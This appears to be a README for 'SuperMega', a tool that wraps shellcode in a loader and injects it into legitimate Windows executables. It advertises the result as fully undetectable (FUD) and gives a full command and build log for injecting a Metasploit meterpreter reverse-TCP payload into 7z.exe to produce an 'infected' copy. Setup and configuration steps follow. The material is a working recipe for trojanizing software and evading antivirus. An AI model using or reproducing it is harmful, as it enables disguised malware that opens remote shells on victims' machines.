Ophiocordyceps camponoti-balzani is a species of fungus that parasitizes insect hosts of the order Hymenoptera, primarily ants. O. camponoti-balzani infects ants, and eventually kills the hosts after they move to an ideal location for the fungus to spread its spores.

What

SuperMega is a shellcode loader. It will take a shellcode as input, protects it, adds a loader, and injects the resulting shellcode into an exe.

FUD.

And:

Only works with 64 bit (shellcode and infecteble exe's)

Features:

Loader source is C yay
Execution-Guardrails
- Environment variables
configurable implementation
different EXE injection techniques

Plugins:

source style:
- PEB_WALK
- IAT_REUSE
alloc style:
- RWX
- REUSE_RWX
decoder style:
- PLAIN_1
- XOR_1
dataref style:
- APPEND

Examples

Metasploit in 7z

Inject metasploit into 7z.exe. It will use PEB_WALK.

PS C:\repos\supermega> python.exe .\supermega.py --shellcode .\shellcodes\msf-meterpreter-reversetcp.bin --inject .\exes\7z.exe
(supermega.py) Super Mega
(helper.py   ) --[ Remove old files ]
(model.py    ) --( Capabilities: 
(model.py    )   0x0: GetEnvironmentVariableW (b'')
(model.py    )   0x460090: VirtualAlloc (b'')
(supermega.py) --[ SourceStyle: peb_walk
(compiler.py ) --[ C to ASM: build\main.c -> build\main.asm ]
(compiler.py ) ---[ Make ASM from C: build\main.c ]
(compiler.py ) ---[ Fixup  : build\main.asm ]
(compiler.py )     > Replace external reference at line: 8
(compiler.py )     > Replace external reference at line: 395
(compiler.py )     > Replace payload length at line: 389
(compiler.py )     > Add end of code label at line: 807
(compiler.py ) ---[ Cleanup: build\main.asm ]
(assembler.py) --[ Assemble to exe: build\main.asm -> build\main.exe -> build\main.bin ]
(assembler.py) ---[ Assemble ASM to EXE: build\main.asm -> build\main.exe ]
(assembler.py) ---[ EXE to SHC: build\main.exe -> build\main.bin ]
(helper.py   ) --[ Code section: .text
(helper.py   )     > 0x1000 Code Size: 2557  (raw code section size: 2560)
(assembler.py) --[ Merge stager: build\main.bin + .\shellcodes\msf-meterpreter-reversetcp.bin -> build\main.bin ]
(assembler.py) ---[ Size: Stager: 2557 and Payload: 449  Sum: 3006 ]
(injector.py ) --[ Injecting: build\main.bin into: .\exes\7z.exe -> .\exes\7z.infected.exe ]
(supermega.py) --[ Start infected exe ]

Directories

shellcodes/: Input: Shellcodes we want to use as input (payload)
source/: Input: Loader C templates
plugins/: Input: Loader C implementations
exes/: Input: Nonmalicious EXE files we inject into
build/: build: Temporary files during build process
logs/: build: Files generated by building (inspect for debugging)
out/: output. The generated result: infected exe

Installation

Paths

Configure config.yaml with:

Path to Visual Studio 2022 compiler and assembler
Path to mash_shc and runshc: https://github.com/hasherezade/masm_shc.

config.yaml:

path_cl: 'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\cl.exe'
path_ml64:  'C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\bin\Hostx64\x64\ml64.exe'

path_masmshc:  'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\masm_shc\masm_shc.exe'
path_runshc: 'C:\Users\hacker\Source\Repos\masm_shc\out\build\x64-Debug\runshc\runshc.exe'

Make sure its the Hostx64/x64/ one exe. Make sure to compile msmshc and runshc as 64bit. You can also replace runshc with your own shellcode loader.

Environment Variables

$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin"

Use

"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"

or the VS developer console to find the damn environment variables, and set it in your python console. In my case:

$env:INCLUDE = "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\include;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\VS\include;C:\Program Files (x86)\Windows Kits\10\include\10.0.22621.0\ucrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\um;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\shared;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\winrt;C:\Program Files (x86)\Windows Kits\10\\include\10.0.22621.0\\cppwinrt;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\include\um"
$env:LIB="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files (x86)\Windows Kits\NETFXSDK\4.8\lib\um\x64;C:\Program Files (x86)\Windows Kits\10\lib\10.0.22621.0\ucrt\x64;C:\Program Files (x86)\Windows Kits\10\\lib\10.0.22621.0\\um\x64"
$env:LIBPATH="C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\ATLMFC\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x64;C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.37.32822\lib\x86\store\references;C:\Program Files (x86)\Windows Kits\10\UnionMetadata\10.0.22621.0;C:\Program Files (x86)\Windows Kits\10\References\10.0.22621.0;C:\Windows\Microsoft.NET\Framework64\v4.0.30319"

VS2022 Components

A list of packages/components which may be required for Visual Studio 2022:

C++ 2022 Redistributable Update
C++ Build Insights
C++ CMake tools for windows
C++ /CLI support for v143 build tools (lastest)
MSBuild
MSVC v133 - VS 2002 C++ x64/x86 build tools (latest)
C++ ATL for latest v143 build tools (x86 & x64)
C++ MFC for latest v143 build tools (x86 & x64)
Windows 11 SDK

Languages

Python 57.8%

CSS 16.4%

C 11%

HTML 9.9%

Assembly 4.9%